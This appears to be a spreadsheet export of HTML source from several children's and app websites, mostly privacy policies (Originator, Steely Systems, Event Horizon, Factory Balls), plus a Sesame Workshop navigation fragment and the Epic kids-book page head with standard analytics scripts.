      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/asthma/" title="Asthma" target="_self"&gt;
      &lt;span&gt;Asthma&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="http://sesameworkshop.org/topics/autism/" title="Autism" target="_self"&gt;Autism&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/autism/building-flexibility/" title="Building Flexibility" target="_self"&gt;Building Flexibility&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/autism/family-connection/" title="Family Connection" target="_self"&gt;Family Connection&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/autism/how-to-make-friends/" title="How to Make Friends" target="_self"&gt;How to Make Friends&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/autism/talking-about-autism/" title="Talking About Autism" target="_self"&gt;Talking About Autism&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/eating-well/" title="Eating Well" target="_self"&gt;
      &lt;span&gt;Eating Well&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="http://sesameworkshop.org/topics/family-bonding/" title="Family Bonding" target="_self"&gt;Family Bonding&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/family-bonding/blended-families/" title="Blended Families" target="_self"&gt;Blended Families&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/family-bonding/dads/" title="Dads" target="_self"&gt;Dads&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/family-bonding/grandparents/" title="Grandparents" target="_self"&gt;Grandparents&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/family-bonding/moms/" title="Moms" target="_self"&gt;Moms&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="http://sesameworkshop.org/topics/health/" title="Health and Hygiene" target="_self"&gt;Health and Hygiene&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                  </t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/&gt;
&lt;META HTTP-EQUIV="Pragma" CONTENT="no-cache"&gt;
&lt;META HTTP-EQUIV="Expires" CONTENT="-1"&gt;
&lt;link rel="stylesheet" href="css/stylesheet.css" type="text/css"/&gt;
&lt;title&gt;ORIGINATOR INC. PRIVACY POLICY&lt;/title&gt;
&lt;/head&gt;
 &lt;body&gt;
	&lt;div id="wrapper"&gt;
    &lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">--&lt;div class="logo"&gt;&lt;img src="img/logo_white_med.png" /&gt;&lt;/div&gt;--&gt;
	&lt;div class="faqbkg"&gt;
    &lt;div class="faqtop"&gt;
        &lt;div class="faqholder"&gt;
            &lt;h1&gt;ORIGINATOR INC. PRIVACY POLICY &lt;strong&gt;&lt;em&gt;(Last Updated May 20, 2021)&lt;/em&gt;&lt;/strong&gt;&lt;/h1&gt;
    &lt;/div&gt;
        &lt;div class="singleColumn"&gt;
        &lt;div class="singlecoltop"&gt;
          &lt;div class="qaitem"&gt;
           	&lt;div class="qacontent"&gt;
&lt;p&gt;&lt;span style="line-height: 1.5em;"&gt;Originator Inc. (“Originator”) respects your privacy.   This notice describes Originator’s privacy policy for the website at www.originatorkids.com (the "Website") and mobile and TV apps distributed by Originator (the “Apps,” together with the Website, the “Originator Products”).   We may revise this privacy policy at any time, and the date of last revision will be available at the top of this page.  </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;b&gt; By visiting the Website or using the Apps, you understand and accept this Privacy Policy.   Your continued use of the Originator Products after changes have been posted to the Privacy Policy will constitute your acceptance of such changes.&lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;What information we collect:&lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;   Originator may ask for and collect from you personally identifiable information depending on the information and/or services you request, including your name, email address and other information you knowingly provide.  </t>
  </si>
  <si>
    <t xml:space="preserve">Once you provide your personal information, you are not anonymous to Originator.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="line-height: 1.5em;"&gt;Originator also collects information about the device used to play our Apps, such as operating system, device type, and versions of our Apps you are using.   Originator also collects,, archives, and uses information regarding your use of the Apps as provided herein, including information about level of usage and particular features used. This data is used to more efficiently operate Originator’s business and improve our products..  </t>
  </si>
  <si>
    <t>Under no circumstances, do we match any of the device or use information described in this paragraph to any personally identifiable information we may have unless we need to help you directly with a problem you’ve reported to us.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;How Originator uses your information:&lt;/b&gt;&lt;/p&gt;
&lt;ul style="margin-top: -14px;"&gt;
	&lt;li&gt;To provide you with personalized content.&lt;/li&gt;
	&lt;li&gt;To process and respond to inquiries.&lt;/li&gt;
	&lt;li&gt;To improve the content, usability, and navigability of the Originator Products.&lt;/li&gt;
	&lt;li&gt;To alert you to new Originator Products including new features, special events, offers, and products and services.&lt;/li&gt;
	&lt;li&gt;To communicate with you regarding achievements and progress your child is making in our Apps, and recommendations we may have for you as a parent.&lt;/li&gt;
	&lt;li&gt;To communicate with you regarding billing or other issues related to an account you may have created with us.&lt;/li&gt;
&lt;/ul&gt;
&lt;span style="line-height: 1.5em;"&gt;In the future, we may sell some or all of our assets.</t>
  </si>
  <si>
    <t xml:space="preserve">In such transactions, customer information generally is one of the transferred business assets.   In the event of a merger or sale of our assets including our database, customer information will be transferred.   We will require buyers to honor this Privacy Policy or notify you before making any material changes to the practices outlined in this Policy.&lt;/span&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;Information Sharing with Unaffiliated Third Parties:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;Originator may disclose your personally identifiable information to another entity for the following reasons: (i) for purposes of outsourcing one or more of the functions described in the previous section; (ii) to confirm or update information provided by you; (iii) to inform you of important information; and/or (iv) as a part of a sale of assets as described in the previous section.  </t>
  </si>
  <si>
    <t xml:space="preserve">We may also share your information in response to a subpoena, legal order or official request, or when we believe that doing so may protect your safety or the safety of others.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;How we collect information:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;In addition to the methods described above, we may also collect information using cookies and analytic software embedded in the Apps.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;How we protect information:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;Originator attempts to protect against the loss, misuse and alteration of your personal information. Our servers are protected by reasonable physical and electronic security measures. Despite our best efforts; however, no security measures are completely impenetrable.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;Children:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;Originator does not seek to collect any personally identifiable information directly from children under the age of 13.  </t>
  </si>
  <si>
    <t xml:space="preserve">If you are under 13, please do not submit any personally identifiable information to Originator.   We additionally note that (i) any personally identifiable information that is inadvertently collected from a child will be deleted at the request of the parent or guardian, and (ii) should personally identifiable information be collected from a person we reasonably deem to be a child, it will be deleted.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;Links:   &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;The Originator Products contain links to third-party websites that are intended for parental use.  </t>
  </si>
  <si>
    <t>We have implemented reasonable measures to protect these links from use by a child, but such measures are not foolproof.   Originator is not responsible for the privacy practices or the content of such websites.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;Your California Privacy Rights:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;If you are a California resident, you are entitled by law to request an Information Sharing Disclosure. If you request it, we will provide you with a notice of your right to prevent sharing of your personal information as well as a cost-free means of doing so.</t>
  </si>
  <si>
    <t xml:space="preserve">To receive such a notice, submit a request to the address listed in the Contact section below, specifying that you seek your "California Customer Choice Notice." Please allow thirty days for a response.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;b style="line-height: 1.5em;"&gt;Contacts:  &lt;/b&gt;&lt;span style="line-height: 1.5em;"&gt;If you have any questions, concerns, or suggestions regarding this privacy policy, please contact us at &lt;a href="mailto:info@originatorkids.com"&gt;info@originatorkids.com&lt;/a&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="line-height: 1.5em;"&gt;Copyright © 2013 Originator Inc.   All rights reserved.&lt;/span&gt;&lt;/p&gt;
&amp;nbsp;
           	&lt;/div&gt;
          &lt;/div&gt;
          &lt;div class="columnbot"&gt;&lt;/div&gt;
        &lt;/div&gt;
        &lt;/div&gt;
     &lt;/div&gt;
     &lt;/div&gt;
     &lt;/div&gt;
&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/&gt;
&lt;META HTTP-EQUIV="Pragma" CONTENT="no-cache"&gt;
&lt;META HTTP-EQUIV="Expires" CONTENT="-1"&gt;
&lt;style&gt;body{font-family:Arial,Helvetica,sans-serif;font-size:12px;color:#3d3f3f;width:980px;margin:auto}div#wrapper{margin:60px 105px}h1{color:#333;font-size:19px;margin:12px 0 0 0;position:relative;padding-top:12px;font-family:Arial,Helvetica,sans-serif}h3{color:#4e4e4e;font-size:12px;font-weight:bold;padding:6px 0 0}.logo{text-align:center}.faqtop{background-image:url(img/xserv-top.gif.pagespeed.ic._83TblAeH6.png);background-repeat:no-repeat}.faqbkg{background-image:url(img/serv-tile.gif.pagespeed.ce.</t>
  </si>
  <si>
    <t>JuK6ZUNun4.gif);width:787px}.faqholder{margin-left:12px}.singlecoltop{background-image:url(img/xsingleCol-top.gif.pagespeed.ic. KTL8urTUOq.png);background-repeat:no-repeat}.singleColumn{background-image:url(img/singleCol-tile.gif.pagespeed.ce.kj6hMr36kf.gif);background-repeat:repeat-y}a{color:#00e;cursor:pointer;margin-right:0px}p{display:block}li{display:list-item;padding-top:8px;margin-right:12px}#arrowbullet{list-style-image:url(img/xorangearrow.gif.pagespeed.ic.m1kfryXBKa.png);padding-top:12px;padding-bottom:0px}.qaitem{background-image:url(img/xsingleCol-divider.gif.pagespeed.ic.Jvx6UMC3ur.png);background-repeat:no-repeat;padding-top:12px}.qacontent{margin-left:22px;margin-right:22px}.back-to-top{background-repeat:no-repeat;margin:0px 20px 0px</t>
  </si>
  <si>
    <t>13px;padding:10px 0px 6px;text-align:right;text-transform:capitalize;width:auto}.columnbot{background-image:url(img/xsingleCol-bot.gif.pagespeed.ic.3EE2NKZZrp.png);background-repeat:no-repeat;height:15px}&lt;/style&gt;
&lt;title&gt;ORIGINATOR INC. PRIVACY POLICY&lt;/title&gt;
&lt;/head&gt;
 &lt;body&gt;
	&lt;div id="wrapper"&gt;
    &lt;!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!doctype html&gt;
&lt;html lang="en-us"&gt;
  &lt;head&gt;
    &lt;title&gt;Android Privacy Policy | Kevin Steely | Steely Systems&lt;/title&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="robots" content="noindex"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;link rel="stylesheet" href="css/styles.css" /&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;header&gt;
      &lt;h1&gt;&lt;a href="./index.html"&gt;Kevin Steely&lt;/a&gt;&lt;/h1&gt;
      &lt;h2&gt;Steely Systems&lt;/h2&gt;
      &lt;p&gt;dev {at} steely.systems&lt;/p&gt;    
    &lt;/header&gt;
     &lt;main&gt;
      &lt;h3&gt;Android Privacy Policy&lt;/h3&gt;
      &lt;p&gt;
        This privacy policy applies to all Android apps published under developer name 
        Steely Systems, which is a Google Play Store brand name used by software 
        developer Kevin Steely of Highland Heights, Kentucky ("the Developer"). 
        </t>
  </si>
  <si>
    <t>Apps covered by this privacy policy (represented as "the App" below) include 
        but are not limited to
        &lt;a href="https://play.google.com/store/apps/details?id=systems.steely.mcguffey"&gt;
          EP McGuffey Primer&lt;/a&gt; and
        &lt;a href="https://play.google.com/store/apps/details?id=systems.steely.app_korean_vocabulary"&gt;
          Korean Vocabulary&lt;/a&gt;.              
       &lt;/p&gt;
      &lt;h4&gt;Overview&lt;/h4&gt;
      &lt;p&gt;
         The Developer values users’ privacy and has no interest whatever in exploiting 
        personal information.&lt;/p&gt;
      &lt;p&gt;
        The Developer makes no effort to collect personal information.</t>
  </si>
  <si>
    <t xml:space="preserve">Any personal 
        information collected incidentally&amp;mdash;in log files, analytics data, 
        etc.&amp;mdash;will be used, if at all, only to improve the App’s functionality and/or
        to provide a better user experience. Personal information will never be sold.
       &lt;/p&gt;
      &lt;h4&gt;Advertising&lt;/h4&gt;
      &lt;p&gt;
        </t>
  </si>
  <si>
    <t xml:space="preserve">The App may display advertisements. Some advertisements may be delivered by 
        third-party ad networks. Any advertisements displayed are displayed in good faith,
        but the Developer bears no responsibility for the privacy policies and operating 
        practices of any advertisers.
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
      &lt;h4&gt;Log Files, Analytics&lt;/h4&gt;
      &lt;p&gt;
        The App and/or web-based services used by the App may generate log files, and 
        the Developer may employ analytics tools to monitor app usage. Any information 
        so collected and employed is impersonal and anonymous. Only in law-enforcement 
        scenarios might any information so collected be used with the intent of identifying 
        users personally.
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/p&gt;
      &lt;h4&gt;Cookies&lt;/h4&gt;
        The App may employ cookies. Cookies are text files that enable the 
        effective delivery, function, and management of web-based apps.
       &lt;h4&gt;Disclaimer&lt;/h4&gt;
        </t>
  </si>
  <si>
    <t xml:space="preserve">While the Developer values and safeguards users’ privacy, please be aware that 
        hackers, spammers, and other malicious actors exist. The Developer explicitly 
        disclaims any liability for the misdeeds of others. By using the App, users 
        agree to exercise due caution, understanding that use of the App is at the 
        user’s own risk.       
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;Contact&lt;/h4&gt;
      &lt;p&gt;
         For more information about this privacy policy, please contact the Developer at
        dev {at} steely.systems.
       &lt;/p&gt;
    &lt;/main&gt;
    </t>
  </si>
  <si>
    <t>&lt;footer&gt;
      © 2018-2021 steely.systems
    &lt;/footer&gt;
  &lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"&gt;
&lt;html lang="en-US"&gt;
    &lt;head&gt;
        &lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/&gt;
        &lt;meta name="viewport" content="width=device-width, initial-scale=1"/&gt;
        &lt;meta name="apple-itunes-app" content="app-id=719219382, app-argument=https://www.getepic.com"/&gt;
        &lt;meta name="naver-site-verification" content="b4669f071ee30104dd1c8e08878561f41d3d60d0"/&gt;
        &lt;meta property="keywords" content="Instant access to thousands of great kids books. "/&gt;
        &lt;meta property="copyright" content="Copyright 2020 Epic Creations Inc."/&gt;
        &lt;meta property="application-name" content="Epic"/&gt;
        &lt;meta property="author" content="Epic!</t>
  </si>
  <si>
    <t>Creations Inc."/&gt;
        &lt;meta name="description" content="Get unlimited access to 40,000 of the best books, audiobooks, videos, &amp;amp; more for kids 12 and under. Try it free. "/&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>Open graph --&gt;
        &lt;meta property="og:title" content="Instantly access over 40,000 of the best books &amp;amp; videos for kids on Epic"/&gt;
        &lt;meta property="og:image" content="https://www.getepic.com/assets/website_hero.jpg?v3"/&gt;
        &lt;meta property="og:url" content="https://www.getepic.com/"/&gt;
        &lt;meta property="og:description" content="Try it free"/&gt;
        &lt;meta property="og:site_name" content="Epic - Books for Kids"/&gt;
        &lt;meta property="og:type" content="article"/&gt;
        &lt;!-- Twitter --&gt;
        &lt;meta name="twitter:card" content="summary_large_image"/&gt;
        &lt;meta name="twitter:site" content="@epic4kids"/&gt;
        &lt;meta name="twitter:creator" content="@epic4kids"/&gt;
        &lt;meta name="twitter:title" content="Epic - Books for Kids"/&gt;
        &lt;meta name="twitter:description" content="Instant access to thousands of great kids books. "/&gt;
        &lt;meta name="twitter:image" content="https://www.getepic.com/assets/website_hero.jpg?v3"/&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>Google Site Verification --&gt;
        &lt;!-- Staging Verification - Domain Owner: RA --&gt;
        &lt;meta name="google-site-verification" content="NdBfe8PC89ISFqxLRBh91RyUYE4o4t7f6DYXiyg2Dqo"/&gt;
        &lt;!-- Prod Verification - Domain Owner: SM, PH, RA --&gt;
        &lt;meta name="google-site-verification" content="j84sHav7nBYkvK2PCr4gurIEa4z493Jqq99IPGpbkD0"/&gt;
        &lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">Prod Kids Domain Verification - Domain Owner: RA --&gt;
        &lt;meta name="google-site-verification" content="HZpb99e8K3jUB4kw8QXHPjDP2ut11AE8dwv9vzNkZJw"/&gt;
        &lt;!-- ahrefs Site Verification --&gt;
        &lt;!-- Prod Verification - For VD --&gt;
        &lt;meta name="ahrefs-site-verification" content="24d8f59b6671c2ca7d4628d8ada8625c92a0183df9ba6795145678338ac51cd2"/&gt;
        &lt;title&gt;
            Epic | The Leading Digital Library for Kids | Unlimited Access to
            40,000 of the Best Children's Books &amp; Learning Videos
        &lt;/title&gt;
        &lt;base href="/"/&gt;
        &lt;link rel="stylesheet preload prefetch" href="https://use.typekit.net/oet0muc.css" crossorigin="" as="style"/&gt;
        &lt;link rel="stylesheet preload prefetch" defer="" href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" crossorigin="" as="style"/&gt;
        &lt;link rel="preconnect" href="https://p.typekit.net" crossorigin=""/&gt;
        &lt;link rel="preconnect" href="https://fast.ssqt.io" crossorigin=""/&gt;
        &lt;link rel="preconnect" href="https://www.google-analytics.com" crossorigin=""/&gt;
        &lt;link rel="preconnect" href="https://www.youtube.com" crossorigin=""/&gt;
        &lt;link rel="preconnect" href="https://apis.google.com" crossorigin=""/&gt;
        &lt;link rel="apple-touch-icon" href="apple-touch-icon.png"/&gt;
        &lt;link rel="preload" as="image" href="assets/home/modal-background/modal-book-background.webp"/&gt;
        &lt;script type="text/javascript"&gt;
            Globals = {};
            </t>
  </si>
  <si>
    <t>Stripe = null;
            gapi = null;
            var hostname = window.location.hostname || '';
            var isProd = hostname.match(/getepic|dashboard.storymagic.co/);
            var gidDev = 'UA-59575521-1';
            var gidProd = 'UA-1637671-83';
            var gtmDev = 'GTM-TD2RJF9';
            var gtmProd = 'GTM-NTNK2DB';
            var optDev = 'GTM-5HCT936';
            var optProd = 'GTM-N5KLBWN';
        &lt;/script&gt;
        &lt;!--- Google Analytics (Universal Analytics)  --&gt;
        &lt;script&gt;
            (function (i, s, o, g, r, a, m) {
                i['GoogleAnalyticsObject'] = r;
                (i[r] =
                    i[r] ||
                    function () {
                        (i[r].q = i[r].q || []).push(arguments);
                    }),
                    (i[r].l = 1 *</t>
  </si>
  <si>
    <t>new Date());
                (a = s.createElement(o)), (m = s.getElementsByTagName(o)[0]);
                a.async = 1;
                a.src = g;
                m.parentNode.insertBefore(a, m);
            })(
                window,
                document,
                'script',
                'https://www.google-analytics.com/analytics.js',
                'ga'
            );
            // Google Analytics Id
            var gid = isProd
                ? gidProd // Prod
                : gidDev; // Dev
            var optimizeId = isProd
                ? optProd //</t>
  </si>
  <si>
    <t>Prod
                : optDev; // Dev
            ga('create', gid, 'auto');
            ga('require', optimizeId);
            ga('require', 'ecommerce');
        &lt;/script&gt;
        &lt;!--- End Google Analytics (Universal Analytics)  --&gt;
    &lt;link rel="stylesheet" href="styles.14946d9035198a55f152.css"&gt;&lt;/head&gt;
    &lt;body id="body"&gt;
        &lt;app-root&gt;&lt;/app-root&gt;
        &lt;noscript&gt;
            &lt;div class="unsupported-content"&gt;
                &lt;img src="/assets/characters/somethings-wrong-monster.png" /&gt;
                &lt;span class="unsupported-text"&gt;
                    &lt;h1 style="display: none;"&gt;
                        The only kids' eBook subscription service that offers
                        thousands of high-quality books from well known
                        publishers like HarperCollins, National Geographic and
                        others.
                     &lt;/h1&gt;
                    &lt;h2&gt;JavaScript Required&lt;/h2&gt;
                    &lt;p&gt;
                        Whoops!</t>
  </si>
  <si>
    <t xml:space="preserve">We're sorry but Epic doesn't work properly
                        without JavaScript enabled. Check your web browser's
                        settings to make sure it's enabled.
                     &lt;/p&gt;
                </t>
  </si>
  <si>
    <t>&lt;/span&gt;
            &lt;/div&gt;
        &lt;/noscript&gt;
        &lt;!-- Google API - Auth2 Library --&gt;
        &lt;script src="https://accounts.google.com/gsi/client" async="" defer=""&gt;&lt;/script&gt;
        &lt;!-- tti polyfill --&gt;
        &lt;script&gt;
            ! (function () {
                if ('PerformanceLongTaskTiming' in window) {
                    var g = (window.__tti = { e: [] });
                    g.o = new PerformanceObserver(function (l) {
                        g.e = g.e.concat(l.getEntries());
                    });
                    g.o.observe({ entryTypes: ['longtask'] });
                }
            })();
        &lt;/script&gt;
        &lt;!--</t>
  </si>
  <si>
    <t>Youtube Player - iframe --&gt;
        &lt;script defer="" src="https://www.youtube.com/iframe_api"&gt;&lt;/script&gt;
        &lt;!-- SaaSquatch--&gt;
        &lt;script&gt;
            ! (function (a, b) {
                a('squatch', 'https://fast.ssqt.io/squatch-js@2', b);
            })(function (a, b, c) {
                var d, e, f;
                (c['_' + a] = {}),
                    (c[a] = {}),
                    (c[a].ready = function (b) {
                        c['_'</t>
  </si>
  <si>
    <t>+ a].ready = c['_' + a].ready ||</t>
  </si>
  <si>
    <t xml:space="preserve">[];
                        c['_' + a].ready.push(b);
                    }),
                    (e = document.createElement('script')),
                    (e.async = 1),
                    (e.src = b),
                    (f = document.getElementsByTagName('script')[0]),
                    f.parentNode.insertBefore(e, f);
            }, this);
        &lt;/script&gt;
        &lt;script src="https://unpkg.com/source-map@0.7.3/dist/source-map.js"&gt;&lt;/script&gt;
    &lt;script src="runtime.b8535596c397ebffb0a7.js" defer&gt;&lt;/script&gt;&lt;script src="polyfills-es5.45f25a37bb18d2e711a2.js" nomodule defer&gt;&lt;/script&gt;&lt;script src="polyfills.f6c169fe2374232173be.js" defer&gt;&lt;/script&gt;&lt;script src="scripts.c5648532e9a6a23906a1.js" defer&gt;&lt;/script&gt;&lt;script src="main.2402d32113f9c88ab7cb.js" defer&gt;&lt;/script&gt;&lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
&lt;meta charset="utf-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"&gt;
&lt;meta name="description" content=""&gt;
&lt;meta name="keywords" content=""&gt;
&lt;meta name="author" content=""&gt;
&lt;title&gt;Privacy Policy&lt;/title&gt;
&lt;h2&gt;Privacy Policy&lt;br/&gt;&lt;span style='font-size:9.0pt;font-family:"Tahoma","sans-serif";color:#7F7F7F'&gt;Last updated Jun 23, 2021&lt;/span&gt;&lt;/h2&gt;
&lt;p&gt;Pavel Zinchenko built the "Event Horizon Space Shooting" and the "Event Horizon Space RPG: take part in star battle!" games as Commercial games. This SERVICE is provided by Pavel Zinchenko and is intended for use as is.&lt;/p&gt;
&lt;p&gt; This page is used to inform visitors regarding my policies with the collection, use, and disclosure of Personal Information if anyone decided to use my Service.&lt;/p&gt;
&lt;p&gt;If you choose to use my Service, then you agree to the collection and use of information in relation to this policy.</t>
  </si>
  <si>
    <t>The Personal Information that I collect is used for providing and improving the Service. I will not use or share your information with anyone except as described in this Privacy Policy.&lt;/p&gt;
&lt;h3&gt;Information collected&lt;/h3&gt;
&lt;p&gt; We are keeping information about installation of our apps on your device (like time, date, IP-address).</t>
  </si>
  <si>
    <t>We are keeping the unique ID of your device, if it is submitted by your device during installation.&lt;br /&gt;We may also automatically record your Advertising ID for advertising or analytics purposes. These IDs do not reveal any specified information about the user. Though, if you want to reset your Advertising ID, you can follow these instructions:&lt;br /&gt;
&lt;ul&gt;
  &lt;li&gt;for Android devices: &lt;a href="https://support.google.com/ads/answer/2662922"&gt;https://support.google.com/ads/answer/2662922&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;for iOS devices: &lt;a href="https://support.apple.com/en-us/HT202074"&gt;https://support.apple.com/en-us/HT202074&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/p&gt;
&lt;!--p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">On our website, we use Cookies. Cookies are small bits of information used, in our case, to store user's preferred language and some other settings during current browser's session. You can set your browser to stop accepting cookies which can lead to functionality of our site decreased.
</t>
  </si>
  <si>
    <t>&lt;/p--&gt;
&lt;h3&gt;How do we use it&lt;/h3&gt;
&lt;p&gt;We process this information for the general purposes:&lt;br /&gt;
&lt;ul&gt;
  &lt;li&gt;to provide you with services&lt;/li&gt;
  &lt;li&gt;to communicate with you via email and to respond to your questions and comments&lt;/li&gt;
  &lt;li&gt;for statistical purposes which help us to improve the quality of the services we provide&lt;/li&gt;
  &lt;li&gt;marketing analytics&lt;/li&gt;
&lt;/ul&gt;
&lt;/p&gt;
&lt;h3&gt;How do we store it&lt;/h3&gt;
&lt;p&gt; We have physical, electronic, and procedural safeguards that comply with regulations to protect personal information about you. However, the internet is not a 100% secure environment, and we cannot guarantee the security of any information you transmit to us.&lt;/p&gt;
&lt;h3&gt;How do we share it&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>We can share collected data with third parties (i.e. AdMob, Unity), who provide equivalent level of protection of data&lt;/p&gt;
&lt;p&gt; We have never received any requests from the state authorities of any country for providing such information.&lt;br /&gt;However, we believe it is necessary to share information if it is required by law, in order to investigate, prevent, or take action regarding illegal activities, suspected fraud, situations involving potential threats to the physical safety of any person.&lt;/p&gt;
 &lt;h3&gt;</t>
  </si>
  <si>
    <t>External links&lt;/h3&gt;
&lt;p&gt;Our website and some of our apps may have links to other sites, apps and services. They do not operate under this Privacy Policy, we recommend you to review their own privacy policies.
 &lt;/p&gt;
&lt;h3&gt;Agreement with this Policy&lt;/h3&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>By using our website and apps, you are confirming that you are agreed with our Privacy Policy. In case you do not agree with it, we recommend you to refrain from using our products.
 &lt;/p&gt;
&lt;h3&gt;Your rights&lt;/h3&gt;
&lt;p&gt;You have the rights to correct your data, have your data deleted, object to how we use or share your data and restrict how we use or share your data.</t>
  </si>
  <si>
    <t>Your consent can be revoked.&lt;/p&gt;
&lt;h3&gt;Contact us&lt;/h3&gt;
&lt;p&gt; If you have any other requests regarding privacy, please, contact us at: help.eventhorizon@gmail.com&lt;/p&gt;
&lt;/body&gt;
&lt;/html&gt;</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
&lt;link rel="stylesheet" type="text/css" href="bbnewstyle1801.css"&gt;
&lt;title&gt;privacy policy, Factory Balls&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div class="bio"&gt;
&lt;h1&gt;"Factory Balls", Privacy Policy&lt;/h1&gt;
 &lt;br&gt;
&lt;p&gt;
 This page is used to inform you regarding my policies with the collection, use and disclosure of personal information for my app "Factory Balls".</t>
  </si>
  <si>
    <t xml:space="preserve">I respect the privacy of my users and I'm committed to protect the user's information, be it yours or your children's. I believe that you have a right to know my practices regarding the information I may collect and use when you use my app.
 &lt;br&gt;&lt;br&gt;
The "Factory Balls" app collects no personal data at all.&lt;br&gt;&lt;br&gt;
